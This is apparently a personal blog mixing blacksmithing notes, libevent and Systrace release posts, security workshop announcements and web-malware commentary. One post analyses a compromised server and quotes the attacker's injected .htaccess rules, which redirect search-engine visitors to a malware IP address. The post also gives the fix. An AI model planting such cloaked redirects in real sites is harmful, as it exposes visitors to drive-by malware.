Niels Provos

The landlord visited today while I was working on some bolt jaw tongs. When he saw me blacksmithing, he told me that he used to turn the crank blower for a blacksmith when he was a boy and recited the following poem:

Under a spreading chestnut tree
The village smithy stands;
The smith, a mighty man is he,
With large and sinewy hands;
And the muscles of his brawny arms
Are strong as iron bands.

His hair is crisp, and black, and long,
His face is like the tan;
His brow is wet with honest sweat,
He earns whate'er he can,
And looks the whole world in the face,
For he owes not any man.

Read More

We recently published an article on web-based malware in ACM's Queue Magazine. It provides a short overview of some of the challenges with detecting malicious web sites such as social engineering and examples of techniques for compromising web sites, e.g. htaccess redirection on Apache, etc. This is the article on which my recent ISSNet talk was based.

I learned how to make a monkey tool today. Monkey tools can be used for dressing tenons. The basic procedure is as follows.
Take 1in square stock and chamfer the edges. Take a slot punch and move it about an 1in from the corner - this is the hammer end. Line the slot punch up very carefully, so that its straight and divides the stock in the middle. Hit it a couple times to get a registration. Now, get the stock nice and hot, align the slot punch with the registration, hit it hard three times, cool the slot punch in water, rotate it by 180 degrees and repeat. At some point, the slot punch is almost through, flip the stock over and use the slot punch to punch out the remaining piece of metal. Now, use a drift to open up the hole to the desired size. Start the drift from the other side of the slot. Doing this over the hardy hole is a good idea. With the slot still inserted, dress up the faces. Then chamfer the corners. Cut off the other side for the length of the tenon and drill a hole of the right size.
That's it. Out of the four holes I drifted only two came out sort of in the middle

To get better control over the atmosphere in the forge, I have decided to build a blown gas forge based on a design by Tim Zowada. The basic structure is provided by a 10 gallon compressed air tank I picked up from Lowes. Using Tim's forced-air manifold, the forge should easily get up to welding temperature (2300F).

Jon who runs the TemperChi Glass Art Studio is helping with building this thing and already has some cerawool for lining the inside. The Cerawool is going to get covered with a 1/4in layer of Satanite and then with an ITC-100 coating. The forge floor will be made from Bubble Alumina refractory which has a heat rating of up 3300F and is supposed to be very resistant to flux. The inside diameter of the forge will be 8 inches and the length about 12 inches.

If you are interested in making glass beads, you can learn that at the shop, too, as well as welding

A list of the top-10 malware sites found by Google's infrastructure over the last two months is available at the Google Online Security Blog. Gumblar and Martuz are among them as well as googleanalytlcs.net. There certainly have been lots of compromised web servers recently.

The 2nd USENIX LEET workshop is going to take place on April 21st in Boston next week. The workshop program looks really interesting. There are a number of really interesting talks; here are just a few:

• Spamcraft: An Inside Look At Spam Campaign Orchestration
• A Foray into Conficker's Logic and Rendezvous Points
• A View on Current Malware Behaviors

Last year's workshop was a blast and I expect that next week is going to be lots of fun, too. It is still possible to register on-site for the workshop.

In preparation for CodeCon, Nick and I wanted to see how HTTP performance differs between Libevent 1.4 and Libevent 2.0. HTTP is a good test case as it exercises many of the optimized components. Here is a preliminary result.

The libevent HTTP server is serving 200,000 bytes of content for each request. Apache's benchmark tool ab was used to make 15,000 requests with 40 requests happening in parallel.

• 1.4.10:
  Requests per second: 1450.79 [#/sec] (mean)
• 2.0:
  Requests per second: 1961.99 [#/sec] (mean)
• 2.0 (evbuffer_add_reference):
  Requests per second: 3979.31 [#/sec] (mean)

In Libevent 2.0, the evbuffer interface was rewritten to avoid memory copies where possible. This seems to result in a 35% performance improvement. The evbuffer_add_reference() API allows external memory to be associated with an evbuffer and thus avoids another memory copy. This results in about 100% performance increase. In comparison to Libevent 1.4, this is almost 175% faster.

In the meantime, Nick is working on making IOCP available for Windows.

WOOT is the Workshop on Offensive Technologies. This year, it's being held for the third time and the call for papers just came out. Submissions are solicited for a variety of interesting topics including:

• Vulnerability research (software auditing, reverse engineering)
• Exploit techniques and automation
• Malware design and implementation (rootkits, viruses, bots, worms)

The last two years were a lot of fun and this years organizers are an eclectic bunch of well known folks. If you have anything in the works, go submit it and we will see you at the workshop.

This release contains a number of small bug fixes:

- 32-bit compilation has been fixed
- 32-bit policies are no longer created as Linux64 with running on a 64-bit system

The source code can be downloaded here [sig].

I got to set up the anvil today and spent a few minutes hammering hot metal. The construction for the anvil stand is from Mark Asprey's book. Joe welded the anvil stand for me and even though the feet are not the same size, it turned out to be surprisingly level. The 165 pound anvil is bolted on top of four layers of plywood. It's reasonably solid but moves a little bit when hit hard.

A new version of Systrace that supports 64-bit Linux installations can be downloaded from here. The major changes are support of 64-bit Linux with ptrace as well as 32-bit binaries under a 64-bit system. Let me know if you run into any issues with this.

We just released libevent 1.4.9-stable. You can download the source from the usual place:

http://monkey.org/~provos/libevent-1.4.9-stable.tar.gz

This release fixes a number of bugs:

• fixed several memory leaks in the HTTP layer.
• fixed signal handling for multi-threaded applications.
• fixed issues with the timer cache when leaving/entering the event loop.

Check here for a more detailed change list.

Thanks to Dean McNamee, Victor Chang, Alejo Sanchez, Richard Jones, Robin Haberkorn and everyone else who reported bugs or supplied patches.

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:

curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas

curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.

Jupiter, Venus and Moon are currently in close conjunction in the evening sky. It is quite an amazing sight and can still be seen tomorrow, too. Over Thanksgiving, we also set up the telescope in front of the house to look at the moons of Jupiter which was quite fun. I tried to take a quick picture of the Moon, Jupiter and Venus, but got it over exposed. The extreme light pollution in Mountain View makes it difficult to take any pictures of the night sky.

The light pollution here is so bad that most stars are never visible. I assume there must be a good reason to waste so much electricity on lightening up the sky - I just don't know it.

During my invited talk on web-based malware at USENIX Security, I mentioned SQL Injection as one of the more popular means of compromising web servers. Although I did not have a chance to post my slides, here is one graph that shows how many URLs with drive-by downloads due to SQL injection were found by Google's infrastructure in July 2008; it's over 800,000 URLs. Curiously, most of these were due to the Asprox botnet.

The situation has slightly changed since then, Asprox has become quiet and most of the SQL Injection attacks seem to originate from Chinese sites. One way to determine if a site has been injected with malicious content is the Safe Browsing diagnostic page which shows infection domains and also how many sites they compromised. Here is an example of a Chinese SQL injection domain, ko118.cn.

To help web application developers, OWASP has published detailed guidelines on preventing SQL injection attacks. More importantly if your web site was SQL injected, its database needs to be cleaned to remove the injected content.